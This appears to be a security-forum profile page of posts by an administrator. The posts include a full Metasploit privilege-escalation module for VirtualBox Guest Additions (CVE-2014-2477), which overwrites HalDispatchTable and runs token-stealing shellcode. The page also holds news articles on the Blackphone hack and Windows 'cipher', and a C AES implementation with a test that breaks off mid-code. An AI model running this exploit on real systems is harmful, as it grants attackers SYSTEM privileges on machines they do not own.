Nytro
Administrators
Posts: 18725
Days Won: 706

Everything posted by Nytro

  1. Post complaints about the staff here: administrators and moderators. Not that we give them much weight, but you will feel better. Stop posting complaints about scams here. And I don't want to see complaints about scams pulled by users with fewer than 50-100 posts.
  2. Nytro

    back on track

    We're still here
  3. I talked to someone from Amazon a while back and today I received this email.

    I wanted to let you know that Amazon is coming to Poland and Romania for a recruiting event.

    Amazon—a place where builders can build. We hire the world's brightest minds and offer them an environment in which they can invent and innovate to improve the experience for our customers. We want employees who will help share and shape our mission to be Earth's most customer-centric company. Amazon's evolution from Web site, to e-commerce partner, to development platform, is driven by the spirit of invention that is part of our DNA. We do this every day by solving complex technical and business problems with ingenuity and simplicity. We're making history, and the good news is that we've only just begun.

    Sound interesting? I would love for you to send back the questions below along with your most recent resume.

    · Are you open to relocating to Seattle, UK or Canada with relocation assistance for the right opportunity? Please list order of preference:
    · Do you have a university degree? What was it in?
    · Will you currently or in the future need work sponsorship from Amazon? If yes, could you explain what visa you are currently on, and when it will expire?
    · What is your current compensation (base, bonus, equity) and what would you expect to see in a future offer?
    · Have you ever interviewed with Amazon.com US or internationally? If yes, when and with which team?
    · Are you currently an individual contributor or a people manager? If you are a manager, how many direct reports do you currently have?
    · Are you currently interviewing with other companies? Do you have or are you expecting to have an upcoming offer deadline from another company?

    Please send me a confirmation email ASAP with your updated resume for review. We value your referrals, please don't hesitate to share my information with any of your friends/colleagues who may be interested.

    If anyone is interested, send me your CV by PM.
  4. Note: encryption/decryption is done on blocks of 16 bytes. That is, 128 bits. That is, it's AES on 128 bits. (So everyone understands.)
  5. VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'msf/core/exploit/local/windows_kernel'
    require 'rex'

    class Metasploit3 < Msf::Exploit::Local
      Rank = AverageRanking

      include Msf::Exploit::Local::WindowsKernel
      include Msf::Post::File
      include Msf::Post::Windows::FileInfo
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process

      def initialize(info={})
        super(update_info(info, {
          'Name'           => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
          'Description'    => %q{
            A vulnerability within the VBoxGuest driver allows an attacker to inject memory
            they control into an arbitrary location they define. This can be used by an
            attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by
            subsequently calling NtQueryIntervalProfile on Windows XP SP3 systems. This has
            been tested with VBoxGuest Additions up to 4.3.10r93012.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [
            'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
            'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
          ],
          'Arch'           => ARCH_X86,
          'Platform'       => 'win',
          'SessionTypes'   => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread',
          },
          'Targets'        => [
            ['Windows XP SP3',
              {
                'HaliQuerySystemInfo' => 0x16bba,
                '_KPROCESS' => "\x44",
                '_TOKEN'    => "\xc8",
                '_UPID'     => "\x84",
                '_APLINKS'  => "\x88"
              }
            ]
          ],
          'References'     => [
            ['CVE', '2014-2477'],
            ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
          ],
          'DisclosureDate' => 'Jul 15 2014',
          'DefaultTarget'  => 0
        }))
      end

      # Allocate RWX memory at a fixed low address in the current process and copy the stager there
      def fill_memory(proc, address, length, content)
        session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

        if not proc.memory.writable?(address)
          vprint_error("Failed to allocate memory")
          return nil
        else
          vprint_good("#{address} is now writable")
        end

        result = proc.memory.write(address, content)

        if result.nil?
          vprint_error("Failed to write contents to memory")
          return nil
        else
          vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
        end

        return address
      end

      def check
        if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
          return Exploit::CheckCode::Safe
        end

        handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
        if handle.nil?
          return Exploit::CheckCode::Safe
        end
        session.railgun.kernel32.CloseHandle(handle)

        os = sysinfo["OS"]
        unless (os =~ /windows xp.*service pack 3/i)
          return Exploit::CheckCode::Safe
        end

        file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
        unless file?(file_path)
          return Exploit::CheckCode::Unknown
        end

        major, minor, build, revision, branch = file_version(file_path)
        vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

        unless (major == 4)
          return Exploit::CheckCode::Safe
        end

        # Fixed builds: 4.0.26, 4.1.34, 4.2.26, 4.3.12
        case minor
        when 0
          return Exploit::CheckCode::Vulnerable if build < 26
        when 1
          return Exploit::CheckCode::Vulnerable if build < 34
        when 2
          return Exploit::CheckCode::Vulnerable if build < 26
        when 3
          return Exploit::CheckCode::Vulnerable if build < 12
        end

        return Exploit::CheckCode::Safe
      end

      def exploit
        if is_system?
          fail_with(Exploit::Failure::None, 'Session is already elevated')
        end

        if sysinfo["Architecture"] =~ /wow64/i
          fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
        elsif sysinfo["Architecture"] =~ /x64/
          fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
        end

        unless check == Exploit::CheckCode::Vulnerable
          fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
        end

        handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
        if handle.nil?
          fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
        end

        print_status("Disclosing the HalDispatchTable address...")
        hal_dispatch_table = find_haldispatchtable
        if hal_dispatch_table.nil?
          session.railgun.kernel32.CloseHandle(handle)
          fail_with(Failure::Unknown, "Failed to disclose HalDispatchTable")
        else
          print_good("Address successfully disclosed.")
        end

        print_status('Getting the hal.dll base address...')
        hal_info = find_sys_base('hal.dll')
        fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
        hal_base = hal_info[0]
        print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
        hali_query_system_information = hal_base + target['HaliQuerySystemInfo']

        print_status("Storing the shellcode in memory...")
        this_proc = session.sys.process.open

        # The kernel stager first restores HalDispatchTable+0x4 to its original value,
        # then runs the token-stealing shellcode
        restore_ptrs = "\x31\xc0"                                          # xor eax, eax
        restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
        restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V')        # mov dword ptr [nt!HalDispatchTable+0x4], eax

        kernel_shell = token_stealing_shellcode(target)

        kernel_shell_address = 0x1
        buf = "\x90" * 0x6000
        buf[0, 56] = "\x50\x00\x00\x00" * 14
        buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell

        result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
        if result.nil?
          session.railgun.kernel32.CloseHandle(handle)
          fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
        else
          print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
        end

        print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
        session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0)
        session.railgun.kernel32.CloseHandle(handle)

        print_status("Executing the Kernel Stager through NtQueryIntervalProfile()...")
        session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

        print_status("Checking privileges after exploitation...")
        unless is_system?
          fail_with(Failure::Unknown, "The exploitation wasn't successful")
        else
          print_good("Exploitation successful!")
        end

        p = payload.encoded
        print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
        if execute_shellcode(p)
          print_good("Enjoy")
        else
          fail_with(Failure::Unknown, "Error while executing the payload")
        end
      end
    end

    Source: VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation - CXSecurity.com
  6. How to securely overwrite deleted files with a built-in Windows tool
    Ian Paul @ianpau

    Most Windows users know that when you delete a file on a PC, it isn't truly gone and can still be recovered. In fact, those deleted files are actually just sitting there on your hard drive until they are overwritten with new data. To truly wipe data, users often turn to apps like CCleaner or Eraser that wipe free space for you. But Windows also has a built-in feature called Cipher that will overwrite deleted files for you and may even free up some extra disk space in the process.

    Commanding Windows

    To use Cipher we have to dive into an area of your Windows machine that some hassle-free readers may have little experience with: the Command Prompt. Don't worry, though. While the command line can be a scary place, Cipher is a fairly safe feature. That said, it's always best to make sure you have your data backed up before giving something like this a try. Also, make sure you type the command correctly to avoid any unintended consequences. Cipher isn't just a tool to overwrite deleted data; it can also be used to encrypt data, which is not what we want in this case.

    Dump the deletions

    To get started you have to open a command prompt. To do this in Windows 8.1, hit the Windows key + S and type command prompt into the search box. Wait for the results to show up and then click the command prompt option. In Windows 7, it's easiest to click on Start > Run and then type cmd into the box and press enter.

    Now for the easy part. If you have a standard Windows installation, type or copy and paste the following command:

    cipher /w:C

    What this tells Windows to do is to start the Cipher program. The '/w' switch says to remove any data from the available unused disk space, and C tells Windows to carry out this action on the C:\ drive. If your data is on a different drive, such as a partition labeled D:\, simply substitute C for the correct drive letter. For most people, however, C will be the right choice.

    Now, just sit back and wait for Windows to do its magic. This is one of those tasks you should run when you're not using your PC. Consider running it overnight or during downtime on the weekend. Windows will also advise you to close as many running programs as possible to help the machine do a better job of clearing up your hard drive.

    Not only will cipher clean up your drive, it may also have the added benefit of returning some extra disk space to you. Recently, I let cipher run and got back about 10GB on a four year-old PC.

    Source: How to securely overwrite deleted files with a built-in Windows tool
  7. Blackphone goes to Def Con and gets hacked—sort of
    Over-the-air hacks of BlackBerry, others fly under radar; tweet on Blackphone hack doesn't.
    by Sean Gallagher - Aug 12 2014, 10:07pm

    When the Blackphone team arrived at Def Con last week, they knew they were stepping into a lion's den. In fact, that's exactly why they were there. The first generation Blackphone from SGP Technologies has been shipping for just over a month, and the company's delegation to DefCon—including Silent Circle Chief Technology Officer Jon Callas and newly hired SGP Technologies Chief Security Officer Dan Ford—was looking to both reach a natural customer base and get help with further locking down the device.

    Ask and you shall receive. Jon "Justin Case" Sawyer, the CTO of Applied Cybersecurity LLC, walked up to the Blackphone table at Def Con and told them he rooted the phone. And those who followed him on Twitter received an abbreviated play-by-play.

    What followed, however, was not what Sawyer or the Blackphone team counted on: a BlackBerry blogger at N4BB leapt on one of Sawyer's tweets and wrote a story with the erroneous headline, "Blackphone Rooted Within 5 Minutes." By the time Sawyer was presenting on Sunday at Def Con with Tim Strazzere, the story had been picked up by a number of blogs and websites—and nearly all of them didn't bother getting further details from Sawyer or Blackphone. BlackBerry partisans gloated over the hack.

    But the irony is that three days earlier, researchers from Accuvant showed in a presentation at Black Hat that they could remotely attack BlackBerry phones (as well as some Android and iOS devices) with a femtocell man-in-the-middle attack, getting root without even touching the phone. So the question is whether BlackBerry fans have any room to brag, or whether they're simply safer because they're not as big a target as Android.

    Rooted in (a lot more than) five minutes

    Sawyer's Blackphone hack was in many ways already moot by the time he demonstrated it. In part, it relied on an already-patched problem in Blackphone's remote wipe software, which Sawyer hadn't downloaded—mostly because he bought the phone at Def Con and didn't want to do anything over the Wi-Fi at the conference. In a conversation with Ars, Sawyer said that the hack required three vulnerabilities in all—one that is a lower-threat vulnerability to a wide range of Android-based devices and has not yet been fully disclosed.

    Additionally, he said, the rooting of the Blackphone required that the attacker: have physical access to the phone and connect it to a computer via USB, configure the phone against Blackphone's set-up recommendations, not install encryption on the device, ignore an unknown application source warning, and have the phone's PIN code. In other words, to hack the Blackphone, the hacker would have to have either obtained it from a very naïve user or bought the phone himself.

    Vulnerability or feature?

    According to the Blackphone team, the first "bug" Sawyer leveraged was in fact not really a vulnerability—he re-enabled the Android Debug Bridge (ADB) to gain developer access to the phone. ADB doesn't provide root access by itself, but it does give full user access to the device from a USB-connected computer. The interface to ADB is "a standard part of every Android install," SGP Technologies CEO Toby Weir-Jones said in a phone interview with Ars. ADB had been disabled by default on the Blackphone, he said, because of a bug in its implementation in PrivatOS that resulted in a USB "boot loop" when the phone's encryption was turned on. "All we had done was remove the ability to call up the developer menu," Weir-Jones explained. "We hadn't isolated the bug yet and had to burn a ROM to ship the first phones." ADB will be turned back on once the bug is fixed, as part of an over-the-air patch.

    In a blog post, Dan Ford explained SGP's position on the ADB issue. "Disabling ADB is not a security measure," he wrote. "And was never meant to be—it will be returning in an OTA to Blackphone in the future once the boot bug is resolved; the realities of getting a product manufactured and shipped within the available manufacturing window meant a quick fix was needed. No root or other privilege escalation was required in order for this to be performed."

    Sawyer disputed that assertion. "I disagree with [Ford's] statement that enabling USB debugging when they explicitly disabled the ability to do so is not a vuln," he tweeted.

    The second vulnerability leveraged in the hack went after Blackphone's remote wipe functionality. The code that shipped on the Blackphone had been compiled with debugging enabled, which meant that an attacker could leverage the code to elevate his or her system privileges on the phone. SGP had already caught that bug independently, and it sent out a patch as part of an over-the-air update.

    The last piece of the attack was a previously undisclosed bug. Sawyer described that bug as "really impractical to hit, and very hard, and very low risk" as it requires that the attacker has already elevated permissions to those of a system user to pull off.

    Part of what kicked up the dust around Sawyer's hack was the initial interaction he had with the Blackphone team on site. SGP doesn't have a bug bounty program. So when someone at Blackphone's table handed Sawyer a t-shirt after he reported his rooting, he refused it, as he had already gotten one with his purchase of the phone. But he did go and modify the one he had. "The shirt was the most impressive part of the hack, considering I had it made in minutes," Sawyer said. When Ford saw the shirt, Sawyer recounted, he laughed.

    Weir-Jones explained that bug bounties are contrary to the company's philosophy of "democratic access" to information—aside from the fact that it would be too expensive for the small company. "Usually, bug bounties are run by larger companies, after they've had time to really tighten down code themselves," he explained. To be fair, BlackBerry also doesn't have a bug bounty program. And Blackphone's PrivatOS is open source, as are the Silent Circle applications.

    And as Sawyer said, the Blackphone vulnerabilities were eclipsed in severity by the attacks on the BlackBerry and other phones that were unveiled at Black Hat. "Two mobile Black Hat talks were 1000 times more impressive and scarier than my disclosure," he posted to Twitter.

    Beating the baseband

    One attack, demonstrated at Black Hat by Mathew Solnik and Marc Blanchou, used the embedded over-the-air management interfaces used by wireless carriers to perform carrier-pushed configuration updates. They were able to gain root access to BlackBerry phones, as well as some Android phones and the Sprint configuration of some iOS devices. The devices most vulnerable to the attack were the BlackBerry Z10 and the HTC One M7.

    The attack takes advantage of the machine-to-machine (M2M) interface used by carriers to do remote provisioning of the phone when it's purchased and to push out communications updates. The interface is part of the baseband configuration of the phones—it leverages the baseband processor, which is the system-on-chip that handles the connection to cellular networks. On some devices, the baseband chip can access local storage and memory used by the smart phone's operating system and be used to gain root-level access.

    Mathew Solnik and Marc Blanchou demonstrate an over-the-air remote code execution and jailbreak of a Sprint iPhone getting remote root.

    At Def Con, Ars talked with Jon Callas and Dan Ford about the baseband question. Callas said that the baseband processor in the Blackphone, which is made by Nvidia, has no such access to the memory and storage used by PrivatOS. "It's completely segregated," Callas said. Blackphone is looking at ways to provide an audit of the phone's baseband code to assure users that the cellular modem can't be made into what amounts to a hostile router, "but we assume that it's a hostile router in the way we developed PrivatOS," Callas added.

    It's clear that there are a number of issues left to be fixed with Blackphone. There's an app store in the works that will provide a curated set of pre-audited Android applications, and there have been requests from some customers for a physical switch to turn off the phone's camera and microphone. There have also been complaints about the phone's LTE support. But for a company of about 100 people just a month into its first product's lifecycle, SGP has already shown how serious it is about security. Ford said that the Blackphone team turned around the patch to one already-discovered issue and shipped it out as an over-the-air update "in less than 48 hours."

    Source: Blackphone goes to Def Con and gets hacked—sort of | Ars Technica
  8. [C] AES Implementation
    by X-N2O

    I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy.

    // AES Implementation by X-N2O
    // Started: 15:41:35 - 18 Nov 2009
    // Finished: 20:03:59 - 21 Nov 2009
    // Logarithm, S-Box, and RCON tables are not hardcoded
    // Instead they are generated when the program starts
    // All of the code below is based from the AES specification
    // You can find it at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
    // You may use this code as you wish, but do not remove this comment
    // This is only a proof of concept, and should not be considered as the most efficient implementation

    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>

    #define AES_RPOL 0x011b // reduction polynomial (x^8 + x^4 + x^3 + x + 1)
    #define AES_GEN 0x03 // gf(2^8) generator (x + 1)
    #define AES_SBOX_CC 0x63 // S-Box C constant

    #define KEY_128 (128/8)
    #define KEY_192 (192/8)
    #define KEY_256 (256/8)

    // GF(2^8) multiplication via log/antilog tables: a*b = g^(log a + log b)
    #define aes_mul(a, b) (((a)&&(b))?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(b)])%0xff]:0)
    // multiplicative inverse: a^-1 = g^(255 - log a); needs g_aes_ilogt[0xff] == 1 for a == 1
    #define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0)

    unsigned char g_aes_logt[256], g_aes_ilogt[256];
    unsigned char g_aes_sbox[256], g_aes_isbox[256];

    // Key schedule words are 32-bit; uint32_t keeps this correct on 64-bit builds,
    // where the original unsigned long is 8 bytes wide.
    typedef struct {
        unsigned char state[4][4];
        int kcol;
        size_t rounds;
        uint32_t keysched[]; // 4*(rounds+1) words, allocated right after the struct
    } aes_ctx_t;

    void init_aes(void);
    aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen);
    static inline uint32_t aes_subword(uint32_t w);
    static inline uint32_t aes_rotword(uint32_t w);
    void aes_keyexpansion(aes_ctx_t *ctx);
    static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b); // use aes_mul instead
    void aes_subbytes(aes_ctx_t *ctx);
    void aes_shiftrows(aes_ctx_t *ctx);
    void aes_mixcolumns(aes_ctx_t *ctx);
    void aes_addroundkey(aes_ctx_t *ctx, int round);
    void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
    void aes_invsubbytes(aes_ctx_t *ctx);
    void aes_invshiftrows(aes_ctx_t *ctx);
    void aes_invmixcolumns(aes_ctx_t *ctx);
    void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
    void aes_free_ctx(aes_ctx_t *ctx);

    void init_aes(void)
    {
        int i;
        unsigned char gen;

        // build logarithm table and its inverse
        gen = 1;
        for(i = 0; i < 0xff; i++) {
            g_aes_logt[gen] = i;
            g_aes_ilogt[i] = gen;
            gen = aes_mul_manual(gen, AES_GEN);
        }
        // g^255 == g^0 == 1. The loop above never fills this slot, so aes_inv(1) read an
        // uninitialized entry and sbox[1] came out wrong; the old "quickhack" patched the symptom.
        g_aes_ilogt[0xff] = 1;

        // build S-Box and its inverse
        for(i = 0; i <= 0xff; i++) {
            char bi;
            unsigned char inv = aes_inv(i);
            g_aes_sbox[i] = 0;
            for(bi = 0; bi < 8; bi++) {
                // based on transformation 5.1
                // could also be done with a loop based on the matrix
                g_aes_sbox[i] |= ((inv & (1<<bi)?1:0) ^
                    (inv & (1 << ((bi+4) & 7))?1:0) ^
                    (inv & (1 << ((bi+5) & 7))?1:0) ^
                    (inv & (1 << ((bi+6) & 7))?1:0) ^
                    (inv & (1 << ((bi+7) & 7))?1:0) ^
                    (AES_SBOX_CC & (1 << bi)?1:0)
                ) << bi;
            }
            g_aes_isbox[g_aes_sbox[i]] = i;
        }
    }

    aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen)
    {
        aes_ctx_t *ctx;
        size_t rounds;
        size_t ks_size;

        switch(keyLen) {
            case 16: // 128-bit key
                rounds = 10;
                break;
            case 24: // 192-bit key
                rounds = 12;
                break;
            case 32: // 256-bit key
                rounds = 14;
                break;
            default:
                return NULL;
        }

        ks_size = 4*(rounds+1)*sizeof(uint32_t);
        ctx = malloc(sizeof(aes_ctx_t)+ks_size);
        if(ctx) {
            ctx->rounds = rounds;
            ctx->kcol = keyLen/4;
            memcpy(ctx->keysched, key, keyLen);
            aes_keyexpansion(ctx);
        }

        return ctx;
    }

    static inline uint32_t aes_subword(uint32_t w)
    {
        return g_aes_sbox[w & 0x000000ff] |
            ((uint32_t)g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) |
            ((uint32_t)g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) |
            ((uint32_t)g_aes_sbox[(w & 0xff000000) >> 24] << 24);
    }

    static inline uint32_t aes_rotword(uint32_t w)
    {
        // May seem a bit different from the spec
        // It was changed because the word is held with little-endian convention on x86
        // Should not depend on architecture, but this is only a POC
        return ((w & 0x000000ff) << 24) |
            ((w & 0x0000ff00) >> 8) |
            ((w & 0x00ff0000) >> 8) |
            ((w & 0xff000000) >> 8);
    }

    void aes_keyexpansion(aes_ctx_t *ctx)
    {
        uint32_t temp;
        uint32_t rcon;
        int i;

        rcon = 0x00000001;
        for(i = ctx->kcol; i < (int)(4*(ctx->rounds+1)); i++) {
            temp = ctx->keysched[i-1];
            if(!(i%ctx->kcol)) {
                temp = aes_subword(aes_rotword(temp)) ^ rcon;
                rcon = aes_mul(rcon, 2);
            } else if(ctx->kcol > 6 && i%ctx->kcol == 4)
                temp = aes_subword(temp);
            ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp;
        }
    }

    static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b)
    {
        unsigned short ac;
        unsigned char ret;

        ac = a;
        ret = 0;
        while(b) {
            if(b & 0x01)
                ret ^= ac;
            ac <<= 1;
            b >>= 1;
            if(ac & 0x0100)
                ac ^= AES_RPOL;
        }

        return ret;
    }

    void aes_subbytes(aes_ctx_t *ctx)
    {
        int i;

        for(i = 0; i < 16; i++) {
            int x, y;
            x = i & 0x03;
            y = i >> 2;
            ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]];
        }
    }

    void aes_shiftrows(aes_ctx_t *ctx)
    {
        unsigned char nstate[4][4];
        int i;

        // row r is rotated left by r positions
        for(i = 0; i < 16; i++) {
            int x, y;
            x = i & 0x03;
            y = i >> 2;
            nstate[x][y] = ctx->state[x][(y+x) & 0x03];
        }

        memcpy(ctx->state, nstate, sizeof(ctx->state));
    }

    void aes_mixcolumns(aes_ctx_t *ctx)
    {
        unsigned char nstate[4][4];
        int i;

        for(i = 0; i < 4; i++) {
            nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^
                aes_mul(0x03, ctx->state[1][i]) ^
                ctx->state[2][i] ^
                ctx->state[3][i];

            nstate[1][i] = ctx->state[0][i] ^
                aes_mul(0x02, ctx->state[1][i]) ^
                aes_mul(0x03, ctx->state[2][i]) ^
                ctx->state[3][i];

            nstate[2][i] = ctx->state[0][i] ^
                ctx->state[1][i] ^
                aes_mul(0x02, ctx->state[2][i]) ^
                aes_mul(0x03, ctx->state[3][i]);

            nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^
                ctx->state[1][i] ^
                ctx->state[2][i] ^
                aes_mul(0x02, ctx->state[3][i]);
        }

        memcpy(ctx->state, nstate, sizeof(ctx->state));
    }

    void aes_addroundkey(aes_ctx_t *ctx, int round)
    {
        int i;

        // byte x of key word (round*4 + y) goes to state[x][y]
        for(i = 0; i < 16; i++) {
            int x, y;
            x = i & 0x03;
            y = i >> 2;
            ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xffu << (x*8))) >> (x*8));
        }
    }

    void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16])
    {
        int i;

        // copy input to state
        for(i = 0; i < 16; i++)
            ctx->state[i & 0x03][i >> 2] = input[i];

        aes_addroundkey(ctx, 0);
        for(i = 1; i < (int)ctx->rounds; i++) {
            aes_subbytes(ctx);
            aes_shiftrows(ctx);
            aes_mixcolumns(ctx);
            aes_addroundkey(ctx, i);
        }

        aes_subbytes(ctx);
        aes_shiftrows(ctx);
        aes_addroundkey(ctx, ctx->rounds);

        // copy state to output
        for(i = 0; i < 16; i++)
            output[i] = ctx->state[i & 0x03][i >> 2];
    }

    void aes_invshiftrows(aes_ctx_t *ctx)
    {
        unsigned char nstate[4][4];
        int i;

        for(i = 0; i < 16; i++) {
            int x, y;
            x = i & 0x03;
            y = i >> 2;
            nstate[x][(y+x) & 0x03] = ctx->state[x][y];
        }

        memcpy(ctx->state, nstate, sizeof(ctx->state));
    }

    void aes_invsubbytes(aes_ctx_t *ctx)
    {
        int i;

        for(i = 0; i < 16; i++) {
            int x, y;
            x = i & 0x03;
            y = i >> 2;
            ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]];
        }
    }

    void aes_invmixcolumns(aes_ctx_t *ctx)
    {
        unsigned char nstate[4][4];
        int i;

        for(i = 0; i < 4; i++) {
            nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^
                aes_mul(0x0b, ctx->state[1][i]) ^
                aes_mul(0x0d, ctx->state[2][i]) ^
                aes_mul(0x09, ctx->state[3][i]);

            nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^
                aes_mul(0x0e, ctx->state[1][i]) ^
                aes_mul(0x0b, ctx->state[2][i]) ^
                aes_mul(0x0d, ctx->state[3][i]);

            nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^
                aes_mul(0x09, ctx->state[1][i]) ^
                aes_mul(0x0e, ctx->state[2][i]) ^
                aes_mul(0x0b, ctx->state[3][i]);

            nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^
                aes_mul(0x0d, ctx->state[1][i]) ^
                aes_mul(0x09, ctx->state[2][i]) ^
                aes_mul(0x0e, ctx->state[3][i]);
        }

        memcpy(ctx->state, nstate, sizeof(ctx->state));
    }

    void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16])
    {
        int i;

        // copy input to state
        for(i = 0; i < 16; i++)
            ctx->state[i & 0x03][i >> 2] = input[i];

        aes_addroundkey(ctx, ctx->rounds);
        for(i = ctx->rounds-1; i >= 1; i--) {
            aes_invshiftrows(ctx);
            aes_invsubbytes(ctx);
            aes_addroundkey(ctx, i);
            aes_invmixcolumns(ctx);
        }

        aes_invshiftrows(ctx);
        aes_invsubbytes(ctx);
        aes_addroundkey(ctx, 0);

        // copy state to output
        for(i = 0; i < 16; i++)
            output[i] = ctx->state[i & 0x03][i >> 2];
    }

    void aes_free_ctx(aes_ctx_t *ctx)
    {
        free(ctx);
    }

    int main(int argc, char *argv[])
    {
        unsigned char key[KEY_128] = "uber strong key!";
        unsigned char ptext[16] = "Attack at dawn!";
        unsigned char ctext[16];
        unsigned char decptext[16];
        aes_ctx_t *ctx;

        init_aes();
        ctx = aes_alloc_ctx(key, sizeof(key));
        if(!ctx) {
            perror("aes_alloc_ctx");
            return EXIT_FAILURE;
        }

        aes_encrypt(ctx, ptext, ctext);
        aes_decrypt(ctx, ctext, decptext);
        puts((char *)decptext);

        aes_free_ctx(ctx);
        return EXIT_SUCCESS;
    }

    In the attached zip you will also find the compiled ELF binary.
    aes.zip

    Source: [C] AES Implementation - Professional Code - rohitab.com - Forums
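    The main() in the post only checks that decrypt undoes encrypt, which proves the two halves agree with each other, not that either matches the standard. The block below is an added known-answer test written for this page; it is not X-N2O's code and shares nothing with it. It rebuilds the S-box the same way the post does (log/antilog tables over the generator x+1, then the FIPS-197 5.1 affine map), spot-checks it against values printed in the spec, and then encrypts the FIPS-197 Appendix C.1 vector with a compact byte-oriented AES-128. The one-line fill of the antilog table's last slot (g^255 = 1) is the step the post's table generator skips, which is why its S-box needed a hand patch at index 1.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint8_t kat_sbox[256];

/* GF(2^8) multiply with the AES reduction polynomial x^8 + x^4 + x^3 + x + 1 */
static uint8_t gmul(uint8_t a, uint8_t b)
{
    uint8_t p = 0;
    while (b) {
        if (b & 1) p ^= a;
        a = (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1b : 0));
        b >>= 1;
    }
    return p;
}

/* S-box from log/antilog tables over generator 0x03, then the FIPS-197 5.1 affine map */
static void build_sbox(void)
{
    uint8_t lg[256], alg[256], g = 1;
    for (int i = 0; i < 255; i++) { lg[g] = (uint8_t)i; alg[i] = g; g = gmul(g, 3); }
    alg[255] = 1;  /* g^255 == g^0: without this slot the inverse of 1 is wrong and so is sbox[1] */
    for (int i = 0; i < 256; i++) {
        uint8_t v = i ? alg[255 - lg[i]] : 0;           /* multiplicative inverse, 0 maps to 0 */
        kat_sbox[i] = v ^ (uint8_t)(v << 1 | v >> 7) ^ (uint8_t)(v << 2 | v >> 6)
                        ^ (uint8_t)(v << 3 | v >> 5) ^ (uint8_t)(v << 4 | v >> 4) ^ 0x63;
    }
}

/* Spot-check the generated table against entries printed in FIPS-197 (Fig. 7, plus the 0x53 example) */
int sbox_matches_spec(void)
{
    build_sbox();
    return kat_sbox[0x00] == 0x63 && kat_sbox[0x01] == 0x7c &&
           kat_sbox[0x53] == 0xed && kat_sbox[0xff] == 0x16;
}

/* AES-128 key schedule: 11 round keys, 176 bytes, words stored byte-wise in order */
static void expand_key128(const uint8_t key[16], uint8_t rk[176])
{
    uint8_t rcon = 1;
    memcpy(rk, key, 16);
    for (int i = 16; i < 176; i += 4) {
        uint8_t t[4];
        memcpy(t, rk + i - 4, 4);
        if (i % 16 == 0) {                               /* RotWord, SubWord, xor Rcon */
            uint8_t tmp = t[0];
            t[0] = kat_sbox[t[1]] ^ rcon;
            t[1] = kat_sbox[t[2]];
            t[2] = kat_sbox[t[3]];
            t[3] = kat_sbox[tmp];
            rcon = gmul(rcon, 2);
        }
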